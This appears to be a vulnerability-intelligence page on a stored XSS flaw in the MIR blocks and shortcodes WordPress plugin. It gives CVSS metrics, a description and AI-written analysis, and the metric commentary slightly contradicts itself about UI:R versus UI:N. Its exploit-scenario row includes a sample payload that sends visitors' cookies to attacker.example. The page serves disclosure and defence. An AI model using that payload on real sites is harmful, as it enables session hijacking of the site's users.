Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Stored XSS requires victim page-load, so UI:R is correct; all other metrics match the provided vector.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The MIR blocks and shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute (and other attributes such as 'ready_animation_text') of the 'msc_stats' shortcode in versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied shortcode attributes inside the msc_stats() rendering function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored Cross-Site Scripting in the Mir Blocks and Shortcodes WordPress plugin (versions up to and including 1.0.0) allows authenticated attackers with contributor-level access to permanently inject arbitrary JavaScript into pages via unsanitized shortcode attributes - specifically the 'title' and 'ready_animation_text' parameters of the msc_stats() rendering function. Any site visitor who loads an injected page executes the attacker's script in their browser, enabling session theft, credential harvesting, or in-page content manipulation. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to hold a WordPress account with at minimum contributor-level role privileges, which allows post creation and shortcode usage. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS 3.1 score of 6.4 (Medium) reflects a network-reachable, low-complexity attack requiring only contributor-level privileges with no user interaction listed (UI:N) and a changed scope. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers or compromises a contributor-level account on a target WordPress site, then edits or creates a post containing the msc_stats shortcode with a malicious payload embedded in the 'title' attribute (e.g., title='<script>document.location='https://attacker.example/steal?c='+document.cookie</script>'). When any authenticated user - including administrators - visits the published page, their browser executes the script, transmitting session cookies to the attacker's server and enabling session hijacking. … |
| Remediation | No vendor-released patch is identified at time of analysis. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38682
GHSA-c2xc-5vpx-hhx9